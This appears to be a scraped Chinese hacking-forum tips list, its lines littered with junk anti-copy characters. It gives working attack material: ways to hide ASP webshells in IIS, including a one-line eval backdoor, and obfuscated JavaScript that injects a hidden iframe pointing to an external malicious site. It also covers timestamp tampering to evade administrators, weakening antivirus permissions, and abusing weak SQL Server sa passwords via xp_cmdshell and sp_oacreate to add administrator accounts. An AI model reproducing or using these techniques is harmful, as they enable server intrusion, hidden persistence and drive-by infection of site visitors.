53、隐藏ASP后门的两种方法
3 A ~0 M6 i' e% {- m( b1、建立非标准目录:mkdir images..\
) n/ V- D0 j" A( [7 N$ k拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp* c$ o7 ? u6 E, u7 d( A" x
通过web访问ASP木马:http://ip/images../news.asp?action=login. u+ k" b0 k$ o. Y. f
如何删除非标准目录:rmdir images..\ /s Z8 E Y' q5 p- @$ x v
2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:5 W* w. N, \. [: _. P* j4 y5 P+ f5 n
mkdir programme.asp
: L# Z, ?. ~) f6 V% x: d2 _新建1.txt文件内容:<!--#include file=”12.jpg”-->
1 i8 m2 _' i) g* _$ O e: L新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件
9 b( y3 T! v+ p4 H, f* O. gattrib +H +S programme.asp
! F5 x& p) F ~* `: _/ U& V通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt. v* @- U( M5 N3 f+ g3 W! f
5 y( s. _8 v/ D9 \: ?5 I( H54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。: A- \$ {% S6 x1 j6 C6 ~+ @; G
然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。
7 s- J' b" r# }% _3 t E9 V' J8 E5 H
55、JS隐蔽挂马
9 b2 J7 y. r% o- ^6 e3 v' ~5 Z1 E3 Z1.
. A4 g; I) v& I5 o" w9 R. n: \7 M. hvar tr4c3="<iframe src=ht";/ b; N: M& x: t* c, M8 b
tr4c3 = tr4c3+"tp:/";$ `0 W$ `) b/ Z$ `# l
tr4c3 = tr4c3+"/ww";# g i* y8 x3 N+ }
tr4c3 = tr4c3+"w.tr4";# q1 @4 F) d9 D. |* t! [
tr4c3 = tr4c3+"c3.com/inc/m";' p* B1 m" A/ |( @
tr4c3 = tr4c3+"m.htm style="display:none"></i";' p; ` `8 P, k/ t4 w8 ?8 @5 X* P
tr4c3 =tr4c3+"frame>'";) a7 p$ F5 b9 W; {
document.write(tr4c3);
6 L* q5 R1 u7 K4 |" l& U' ^避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。
! j+ j1 _: Q" @& f0 o
+ A% B( M, ?9 x6 e2.
* ?% h0 \9 |( f2 E1 d转换进制,然后用EVAL执行。如% p4 n$ M/ J! x
eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");) \; E4 G* R# L2 S* r; ^8 y
不过这个有点显眼。
* \+ G( m5 g6 [% P A! p: v3.0 t6 w6 d8 r+ i* C
document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');* j6 k1 |$ Z, r+ y" U0 ^/ ?6 \$ s
最后一点,别忘了把文件的时间也修改下。
9 [8 Q2 R" f0 h: ?. H- F' i0 L9 b& u/ ^
56.3389终端入侵常用DOS命令! ~# Z) E' Z( ^1 R; O
taskkill taskkill /PID 1248 /t) Y$ U% I4 c: H e7 \$ u ~ b6 h
% O9 ~+ j% l; V7 C) F5 ztasklist 查进程
; }) c/ ?; c1 g/ s9 K/ b& {* v
: k% A/ d$ x9 k' x+ k3 O4 u! gcacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限
- k1 x9 g+ a! F. A5 eiisreset /reboot7 _" T+ c+ c( ~% Q; F
tsshutdn /reboot /delay:1 重起服务器1 L5 h. I, W7 Q! e& G
$ d5 g- X) i7 ~logoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,: D2 P8 m3 Q0 B: ] N- B6 b
! U, u* a. R: ?( _ xquery user 查看当前终端用户在线情况" Y' Y8 e0 J3 i C: r; \- _/ y
9 l9 d: j9 C; R, R& Y' o+ H要显示有关所有会话使用的进程的信息,请键入:query process *
7 Q4 E/ c- R) W5 v- Y/ n+ u4 M7 ~1 J1 @4 T7 }$ F( g2 O+ O7 _1 y
要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2% p* W( m. c4 _: ]
3 R2 M! l. c l7 a, k
要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2
$ q# y V0 n0 S* E
+ }/ ?) E0 j( W8 k# B% z要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02: P8 \3 {5 E7 Y
0 s7 v: e5 k) J命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启
1 Z; G. a) L: C @* I5 d4 D+ ?$ U1 T- @7 b
命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
+ n4 K3 H. M4 {! h% U6 G$ i" K2 s( d5 X0 l' L! ^6 h5 g
命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。. Y2 B- [6 A; }$ |1 q- ]) |
$ w" D; T. [5 E% ^* H% o- i: B命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机
4 R3 }7 B. M9 H; O" M8 O5 i: _: N4 _- r5 Y8 I$ A
56、在地址栏或按Ctrl+O,输入:
0 E" \2 ~+ p" ~, z$ @/ hjavascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;
/ W8 @3 V* x( m5 ~0 f3 r4 u6 @% r2 Q- O; C# q7 f p
源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。, t3 ?1 e6 I N6 A8 f* k
9 R' G/ T+ z, ?5 U57、net user的时候,是不能显示加$的用户,但是如果不处理的话,
! r3 F5 i0 N$ ?- c4 @. o用net localgroup administrators是可以看到管理组下,加了$的用户的。+ e6 ~, l2 R) |; P1 ?& q
8 C% v9 z8 u. J58、 sa弱口令相关命令! ?2 x, @( G T" S1 q) _. a/ \
" b1 S& x6 E6 [$ A- U, F6 I8 z
一.更改sa口令方法:+ R4 m# x: s4 Z' ]7 G' h2 D3 E( N2 o
用sql综合利用工具连接后,执行命令:
# t+ k, j/ f' H, |& t2 R; z" Uexec sp_password NULL,'20001001','sa'
- Z4 O" B: r' H3 Q* k- e3 A0 k(提示:慎用!)
. j) w8 b$ j' h8 r, X8 c( B( \: \7 `2 p
二.简单修补sa弱口令.. `7 ?: X2 B4 D* U' ~1 |& D
* `. ?4 H* E) @$ S+ f7 C方法1:查询分离器连接后执行:
6 ?8 R& d3 R% O$ a5 S9 Zif exists (select * from
; Q! T) q h c5 Odbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and- x5 D5 n8 ^1 A
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)
/ E, \8 M1 l) V9 |- ~- ~! v8 ~+ {1 d" I
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'& J# v8 q2 Q x2 V+ S, h8 Y* V
2 `% ?; W/ \' ^: tGO
9 s& U: m8 |. z( W; L+ m/ p- k9 ~# f
然后按F5键命令执行完毕4 O/ E) O: \ `% A8 z v3 z# J
- `' ] h3 C* c# s- b. f, \& T方法2:查询分离器连接后6 [$ \: i$ l& W/ q; y# D) h
第一步执行:use master
) t% L( h4 W+ L! e- V第二步执行:sp_dropextendedproc 'xp_cmdshell'% g/ a9 m" J) z2 @
然后按F5键命令执行完毕
" @9 x5 U. A, C7 }! A# `7 \1 |3 z
4 O: W, L3 o( P- S- ~+ g7 l/ t' O3 o
三.常见情况恢复执行xp_cmdshell./ P& F' Q# b) Y0 n
4 \+ w- ?* W. |5 I6 v! j: t3 b9 v
1 未能找到存储过程'master..xpcmdshell'.
3 [1 {8 p6 D( S, E% x" H3 ~ 恢复方法:查询分离器连接后,
7 M6 Z. g5 q; O3 Q3 Z第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
: J) Y$ E+ }4 f" ^5 U9 s: @第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'- Z# q, P8 E, [. k2 F0 o& d! S
然后按F5键命令执行完毕1 w6 }& j) I6 l) [& r
; h, x% k7 o1 n# e2 U5 b' r* Q2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)$ U# o R" W' ~; p) ?+ S! x5 M& r
恢复方法:查询分离器连接后,+ m" u o3 @3 F4 D8 Y( S- \! t
第一步执行:sp_dropextendedproc "xp_cmdshell"
3 X& G4 l5 D; C# {第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll': a/ B+ ]7 e$ A; `" \- l
然后按F5键命令执行完毕
3 q" q u6 ~- H" p9 t6 g' c9 {; Y e2 K/ g+ Q) H0 n
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
! V4 y+ C m2 x/ w$ A! m$ A* d U4 t恢复方法:查询分离器连接后,4 G7 I( I. W* a' ? S' j/ [4 @; k
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'# f0 n I- L1 F& e
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
3 j+ y, R2 o q, d然后按F5键命令执行完毕2 D1 o( x5 Q4 C4 d
0 v0 Z- c( x6 Y
四.终极方法.
4 ^' }6 A, h3 P如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:5 p9 h, m g7 b- ?7 A
查询分离器连接后,
0 k$ u" N: J& j$ F( K! S4 z. `2000servser系统:
1 d: B. h1 s0 f: ]# ?, V) Ydeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'
1 k: o( ?$ M" d, \& _* w3 v+ o6 m2 j5 E
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'
+ V v& f4 v8 U4 ]
3 [% ?* ~. L8 `4 Sxp或2003server系统:: u; ?) P6 `% P
! y2 }! A0 u" E# Jdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'! [7 W* W0 L$ z' {4 F
+ X, s9 Q8 _; u
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'. `3 g! N. j( l
|